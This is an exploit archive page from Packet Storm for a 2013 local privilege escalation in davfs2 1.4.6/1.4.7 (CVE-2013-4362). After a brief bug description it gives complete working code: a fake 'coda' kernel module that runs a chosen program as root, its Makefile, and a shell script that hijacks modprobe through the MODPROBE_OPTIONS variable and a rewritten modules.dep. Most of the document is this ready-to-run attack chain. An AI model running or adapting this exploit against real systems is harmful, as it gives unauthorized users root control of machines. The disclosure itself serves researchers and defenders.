exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

davfs2 1.4.6 / 1.4.7 Privilege Escalation

davfs2 1.4.6 / 1.4.7 Privilege Escalation
Posted Oct 8, 2013
Authored by Lorenzo Cantoni

davfs2 versions 1.4.6 and 1.4.7 local privilege escalation exploit.

tags | exploit, local
advisories | CVE-2013-4362, OSVDB-97417
SHA-256 | 12792272e2f14c05cd5916d2f5ecf86ed1ff086e3ba5bf6686de4edea747c9fe

davfs2 1.4.6 / 1.4.7 Privilege Escalation

Change Mirror Download
davfs2 1.4.6/1.4.7 local privilege escalation exploit

*Bug Description*:
davfs2 is a Linux utility which allows OS users to mount a remote webdav server as a local partition. The bug is well documented at http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=723034. Basically the program "mount.davfs" runs as root with setuid and executes some calls to system() which allows to pass environment variables which can alter the system behavior.

*Exploit Description*:
calls to system() execute the "modprobe" command. An unprivileged, local authenticated user can set the "MODPROBE_OPTIONS" environment variable to pass a user controlled path, allowing the load of an arbitrary kernel module. The provided PoC contains a kernel module code which transfers back the execution to a "/tmp/rootprog" that can contain user-mode code of choice which will run with root privileges. PLEASE, NOTE THAT THE PROVIDED POC COMES UNARMED, YOU HAVE TO COMPILE THE USER MODE CODE WHICH YOU WANT TO RUN. The exploit has been tested on an Ubuntu-based x86_64 system but should work on other distributions, too.

*Conditions for successful exploitation*:

1-At least one of the module 'fuse' or 'coda' must not be loaded in the kernel. The provided PoC works with coda, which is not loaded by default in most debian-based distributions.

2-The user which the attacker is impersonating must be allowed to mount remote webdav servers:

eviluser@host:~/hacks/davfs2$ cat /etc/group | grep davfs2
davfs2:x:1001:eviluser

3-davfs2 uses /etc/fstab to define which remote servers can be mounted by users. The user which the attacker is impersonating must be allowed to mount at least one remote Webdav server. If this server uses authentication, the attacker must be aware of the webdav credentials.

eviluser@host:~/hacks/davfs2$ cat /etc/fstab | grep davfs
https://www.crushftp.com/demo/ /home/eviluser/media/dav davfs noauto,user 0 0

####################################################################################################
#
# coda.c
#
####################################################################################################

/*
coda.c - fake coda module that executes a user-mode program
*/

#include <linux/module.h>
#include <linux/kernel.h>

int init_module(void)
{
struct subprocess_info *sub_info;
char *argv[] = { "/tmp/rootprog", NULL, NULL };
static char *envp[] = {"HOME=/tmp/","TERM=linux","PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };


sub_info = call_usermodehelper_setup( argv[0], argv, envp, GFP_ATOMIC );

if (sub_info == NULL)
{
printk(KERN_INFO "call_usermodehelper_setup failed \n");
return -ENOMEM;
}
else
{
printk(KERN_INFO "w00t!!!\n");
call_usermodehelper_exec( sub_info, UMH_WAIT_PROC );
}

return 0;
}

void cleanup_module(void)
{
printk(KERN_INFO "Exiting.\n");
}



####################################################################################################
#
# Makefile
#
####################################################################################################


obj-m += coda.o

all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean



####################################################################################################
#
# exploit.sh
#
####################################################################################################


#!/bin/bash

# Exploit Title: davfs2 1.4.6/1.4.7 local privilege escalation exploit
# Date: 05/10/2013
# Exploit Author: Lorenzo Cantoni
# Vendor Homepage: http://savannah.nongnu.org/projects/davfs2
# Version: 1.4.6 (tested), 1.4.7 (untested)
# Tested on: Xubuntu 12.04 x86_64
# CVE: 2013-4362
# Info: Vulnerability reported by Werner Baumann: http://www.securityfocus.com/bid/62445

KERNELV=`uname -r`
echo "#######################################"
echo "Specify the full path of the kernel module which you want to load"
echo "Leave empty if you wish to compile it now"
echo "Understand that you need kernel headers, make and gcc for successful compilation"
echo "#######################################"
read EXPLOITMODPATH

if [ -z $EXPLOITMODPATH ]; then
make
EXPLOITMODPATH=$PWD/coda.ko
fi

echo "#######################################"
echo "Copying the modules in use for the running kernel in the local directory"
echo "#######################################"
mkdir -p lib/modules
cp -R /lib/modules/`uname -r` lib/modules

echo "#######################################"
echo "Copying coda.ko module"
echo "#######################################"
cp $EXPLOITMODPATH $PWD/lib/modules/$KERNELV/kernel/fs/coda

echo "#######################################"
echo "Setting the 'modules.dep' and running depmod"
echo "#######################################"

echo -n $PWD | sed 's/\//\\\//g' > /tmp/escapedpwd
ESCAPEDPWD=`cat /tmp/escapedpwd`

OLD_CODA_PATH="kernel\/fs\/coda\/coda.ko"
NEW_CODA_PATH="$ESCAPEDPWD\/lib\/modules\/$KERNELV\/kernel\/fs\/coda\/coda.ko"

sed 's/'$OLD_CODA_PATH'/'$NEW_CODA_PATH'/g' $PWD/lib/modules/$KERNELV/modules.dep > /tmp/new_modules.dep

cat /tmp/new_modules.dep | sed 's/\\//g' > /tmp/modules.dep.ok

cp /tmp/modules.dep.ok $PWD/lib/modules/$KERNELV/modules.dep

depmod -b $PWD
echo "#######################################"
echo "Specify the user-mode ELF which you whish to copy in /tmp/rootprog that will be run as root. Default value is $PWD/rootprog"
echo "WARNING !!!!!!!! YOU HAVE ONLY 1 SHOT !!!!! unmounting webdav partitions doesn't unload the coda.ko module"
echo "#######################################"
read ROOTPROG

if [ -z $ROOTPROG ]; then
ROOTPROG=$PWD/rootprog
fi

cp $ROOTPROG /tmp/rootprog

echo "#######################################"
echo "Setting MODPROBE_OPTIONS variable"
echo "#######################################"
export MODPROBE_OPTIONS="-d $PWD"

echo "#######################################"
echo "Now, check the the $HOME/.davfs2/davfs.conf. Modify the default value of 'kernel_fs' to coda eg:"
echo "# General Options"
echo "# ---------------"
echo ""
echo "# dav_user davfs2 # system wide config file only"
echo "# dav_group davfs2 # system wide config file only"
echo "# ignore_home # system wide config file only"
echo "kernel_fs coda"
echo "# buf_size 16 # KiByte"
echo "#######################################"
echo "#######################################"
echo "Then, check /etc/fstab for remote webdav servers which the user can mount, eg:"
echo "https://www.crushftp.com/demo/ /home/foo/dav davfs noauto,user 0 0"
echo "#######################################"
echo "#######################################"
echo "If the remote webdav is authenticated, ensure to have valid credentials. The run 'mount /home/foo/dav' inside this terminal'"
echo "#######################################"
rm /tmp/escapedpwd
rm /tmp/new_modules.dep
rm /tmp/modules.dep.ok

exec /bin/bash -i


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close